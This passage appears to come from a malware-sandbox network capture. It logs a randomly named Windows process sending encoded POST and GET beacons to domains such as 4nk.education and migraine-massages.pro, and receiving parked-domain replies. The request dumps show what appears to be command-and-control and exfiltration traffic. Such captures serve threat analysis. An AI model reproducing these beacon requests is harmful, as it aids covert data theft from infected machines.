                                                                                        Date: Wed, 06 Nov 2024 14:59:57 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID: 3 | Source IP: 192.168.2.8 | Source Port: 49710 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp: Nov 6, 2024 15:59:58.867937088 CET | Bytes transferred: 1673 | Direction: OUT | Data:
POST /gnvu/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        Origin: http://www.4nk.education
                                                                                        Referer: http://www.4nk.education/gnvu/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 77 63 6b 45 56 57 6a 79 4b 5a 2f 4c 39 6e 61 42 31 75 6a 2f 75 69 6d 66 76 39 63 70 6b 57 71 38 30 38 2b 71 57 38 31 58 4d 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 2f 48 38 76 79 4c 4c 41 41 4d 46 46 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 39 6d 74 [TRUNCATED]
                                                                                        Data Ascii: A60d=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 [TRUNCATED]
Timestamp: Nov 6, 2024 15:59:59.691667080 CET | Bytes transferred: 608 | Direction: IN | Data:
HTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 14:59:59 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID: 4 | Source IP: 192.168.2.8 | Source Port: 49711 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp: Nov 6, 2024 16:00:01.404284954 CET | Bytes transferred: 379 | Direction: OUT | Data:
GET /gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 6, 2024 16:00:02.213911057 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:02 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Language
                                                                                        Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 6e 6b 2e 65 64 75 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                                                                        Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
Timestamp: Nov 6, 2024 16:00:02.213989019 CET | Bytes transferred: 890 | Direction: IN | Data:
Data Raw: 2e 65 64 75 63 61 74 69 6f 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 34 6e 6b 2e 65 64 75 63 61 74 69 6f 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                                                                        Data Ascii: .education"><strong>View the WHOIS results of 4nk.education</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


Session ID: 5 | Source IP: 192.168.2.8 | Source Port: 49713 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp: Nov 6, 2024 16:00:07.594315052 CET | Bytes transferred: 660 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 67 70 51 4a 79 6b 71 5a 48 39 58 77 43 65 63 33 7a 56 72 53 72 6d 56 34 7a 6f 5a 39 31 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                        Data Ascii: A60d=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CgpQJykqZH9XwCec3zVrSrmV4zoZ91Hkdks6XJ4=
Timestamp: Nov 6, 2024 16:00:08.162688017 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:08 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 312dede6-eb31-4155-abd0-8bd362997e6d
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=312dede6-eb31-4155-abd0-8bd362997e6d; expires=Wed, 06 Nov 2024 15:15:08 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Timestamp: Nov 6, 2024 16:00:08.162719965 CET | Bytes transferred: 607 | Direction: IN | Data:
Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzEyZGVkZTYtZWIzMS00MTU1LWFiZDAtOGJkMzYyOTk3ZTZkIiwicGFnZV90aW1lIjoxNzMwOTA1Mj


Session ID: 6 | Source IP: 192.168.2.8 | Source Port: 49714 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp: Nov 6, 2024 16:00:10.171973944 CET | Bytes transferred: 680 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4f 2b 34 77 41 76 34 43 61 4d 48 48 38 4b 4a 65 76 67 57 6e 50 4b 44 56 4b 6a 5a 51 55 69 51 43 4c 71 74 47 4f 4e
                                                                                        Data Ascii: A60d=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrO+4wAv4CaMHH8KJevgWnPKDVKjZQUiQCLqtGON
Timestamp: Nov 6, 2024 16:00:10.763211966 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:10 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: b4bdd85e-a784-4815-bee8-c3b43970f04e
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=b4bdd85e-a784-4815-bee8-c3b43970f04e; expires=Wed, 06 Nov 2024 15:15:10 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Timestamp: Nov 6, 2024 16:00:10.763681889 CET | Bytes transferred: 212 | Direction: IN | Data:
Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjRiZGQ4NWUtYTc4NC00ODE1LWJlZTgtYzNiNDM5NzBmMDR
Timestamp: Nov 6, 2024 16:00:10.763691902 CET | Bytes transferred: 395 | Direction: IN | Data:
Data Raw: 6c 49 69 77 69 63 47 46 6e 5a 56 39 30 61 57 31 6c 49 6a 6f 78 4e 7a 4d 77 4f 54 41 31 4d 6a 45 77 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 62 57 6c 6e 63 6d 46 70 62 6d 55 74 62 57 46 7a 63
                                                                                        Data Ascii: lIiwicGFnZV90aW1lIjoxNzMwOTA1MjEwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubWlncmFpbmUtbWFzc2FnZXMucHJvL3ltNDMvIiwicGFnZV9tZXRob2QiOiJQT1NUIiwicGFnZV9yZXF1ZXN0Ijp7fSwicGFnZV9oZWFkZXJzIjp7InJlZmVyZXIiOlsiaHR0cDovL3d3dy5taWdyYWluZS1tYXNzYWdlcy5wcm8veW00My


Session ID: 7 | Source IP: 192.168.2.8 | Source Port: 49715 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp: Nov 6, 2024 16:00:12.722563982 CET | Bytes transferred: 1697 | Direction: OUT | Data:
POST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:14.095112085 CET  1236               IN         HTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 15950622-cd8f-4728-b4b9-0039492f417f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=15950622-cd8f-4728-b4b9-0039492f417f; expires=Wed, 06 Nov 2024 15:15:13 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:14.095128059 CET  607                IN
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU5NTA2MjItY2Q4Zi00NzI4LWI0YjktMDAzOTQ5MmY0MTdmIiwicGFnZV90aW1lIjoxNzMwOTA1Mj


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
